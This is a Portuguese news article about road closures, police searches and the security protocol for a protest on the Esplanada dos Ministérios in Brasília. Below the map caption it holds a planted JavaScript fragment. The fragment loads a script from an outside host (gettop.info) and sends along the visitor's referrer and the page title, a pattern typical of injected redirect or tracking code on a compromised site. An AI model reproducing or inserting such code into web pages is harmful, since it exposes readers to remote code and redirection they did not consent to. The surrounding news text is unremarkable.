Trânsito na Esplanada dos Ministérios é interrompido para manifestação nesta quarta

Mobilização foi convocada para as 9h desta quarta. Foto: José Cruz/Agência Brasil

Para garantir a segurança da população e dos participantes da manifestação popular prevista para esta quarta-feira (24), as vias S1 e N1 serão fechadas a partir da 0h, entre a Rodoviária do Plano Piloto e a Avenida L4 Sul. Os acessos de ministérios e das vias L2 Sul e Norte à Esplanada também serão bloqueados. Como alternativa aos motoristas, a Secretaria da Segurança Pública e da Paz Social (SSP/DF) recomenda a circulação pelas vias S2 e N2, localizadas atrás dos ministérios.

A medida tem caráter preventivo, uma vez que possibilita aos órgãos de Segurança Pública, Defesa e Inteligência – locais e federais – um maior controle das vias e espaços públicos. Esse tipo de procedimento, assim como a limitação de acesso ao gramado em frente ao Congresso Nacional – entre a Catedral e a Avenida das Bandeiras, está previsto no Protocolo Tático Integrado (PrTI) das Manifestações.

Ele foi assinado, mês passado, por 48 instituições do Governo do Distrito Federal, Congresso Nacional e Governo Federal e estabelece as competências dos órgãos signatários antes, durante e depois de atos populares com previsão de reunir grande público na Esplanada ou que preveem um maior efetivo de profissionais de segurança pública.

Além da atuação em campo, os órgãos de segurança pública do DF e demais instituições terão representantes na Central Integrada de Multiagências (CIM), que funciona na sede da SSP/DF. O espaço monitora, por meio de câmeras, todos os atos populares na Esplanada e permite que, de forma conjunta, possam ser tomadas decisões para casos pontuais.

Outra previsão no PrTI são as revistas pessoais, também consideradas medidas preventivas. Nesta quarta-feira, haverá cordões de policiais militares próximos aos ministérios e à Catedral. As abordagens serão feitas especialmente no início do ato, momento em que os manifestantes estão chegando à Esplanada.

Entre as restrições, os manifestantes não poderão levar hastes de bandeiras, garrafas de vidros, madeiras, entre outros objetos cortantes e/ou perfurantes. Esse tipo de orientação também foi repassada aos dez grupos organizadores do protesto que protocolaram os eventos na SSP, até o final da manhã desta terça-feira (23), para que possam contribuir informando ao público.

Confira o mapa de limitação da Esplanada dos Ministérios:

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário